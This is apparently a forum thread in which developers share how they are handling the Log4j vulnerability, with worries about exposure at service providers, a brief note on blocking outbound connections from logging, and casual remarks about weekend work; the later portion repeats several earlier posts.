How are you holding up with this Log4j madness?

Question

Seems most of the industry has been rushing out deployments this weekend.

btown · Accepted Answer

We have avoided Java internally, but I am mainly worried that our ecosystem of SaaS tools, service providers, even payment processors might be bleeding data breaches and nobody knows yet.
All it takes is one old ETL script on an unmaintained server that logs user-submitted records once a week, and their internal networks will be backdoored by script kiddies at some point soon, not to mention sophisticated actors. The companies that downsized technical teams during the pandemic simply don’t have the bandwidth to audit their entire security surface - #hugops to anyone being asked to do this. It’s a perfect storm. And we’re only seeing the beginning.
But it’s not like I’m going to use our corporate credentials to probe our own service providers to see which APIs are vulnerable - I have no desire to be banned and sued. And we’re too small an account to be able to do anything but make ourselves sound paranoid to our account managers. So I’m just waiting for the other shoe to drop. I hope it’s not something that splashes onto our reputation.

beanjuiceII · Answer

I am relaxing at home, and if my employer wants they could pay me time and a half over the weekend, but I've received no call as of yet :) sounds like a monday thing?

ev1 · Answer

our applications cannot make outbound connections from logging (they have to go through a specific class/function/service/factory that sets up all the metadata like mTLS, proxy, etc), and any non-mTLS attempts don't work, along with any to "not recognised" endpoints.
I noticed on thursday thanks to HN and mitigated before 2.15.0 released, and have done nothing all weekend.
i want to know who the fuck on earth actually has a use case of loading a class and running it inline from a logging call rather than calling getUserEmailFromLdap(ou, principal).toString() or something

ironmagma · Answer

It&rsquo;s been nice knowing we are using a sane development stack that doesn&rsquo;t include bloatware.

altdataseller · Answer

I haven't heard many companies actually reporting major exploits, or any major sites having outages..So I'm questioning whether this flaw really does result in remote code execution, or whether the vast majority of companies are using a version of log4j that doesn't have this flaw.

darthrupert · Answer

I run nothing on Java so doing "Kermit drinks tea" while looking at news. With a slight dread that what I am using might have similar problems that we don't know yet.

How are you holding up with this Log4j madness?

Seems most of the industry has been rushing out deployments this weekend.

I am relaxing at home, and if my employer wants they could pay me time and a half over the weekend, but I've received no call as of yet :) sounds like a monday thing?

It’s been nice knowing we are using a sane development stack that doesn’t include bloatware.

I haven't heard many companies actually reporting major exploits, or any major sites having outages..
So I'm questioning whether this flaw really does result in remote code execution, or whether the vast majority of companies are using a version of log4j that doesn't have this flaw.

I run nothing on Java so doing "Kermit drinks tea" while looking at news. With a slight dread that what I am using might have similar problems that we don't know yet.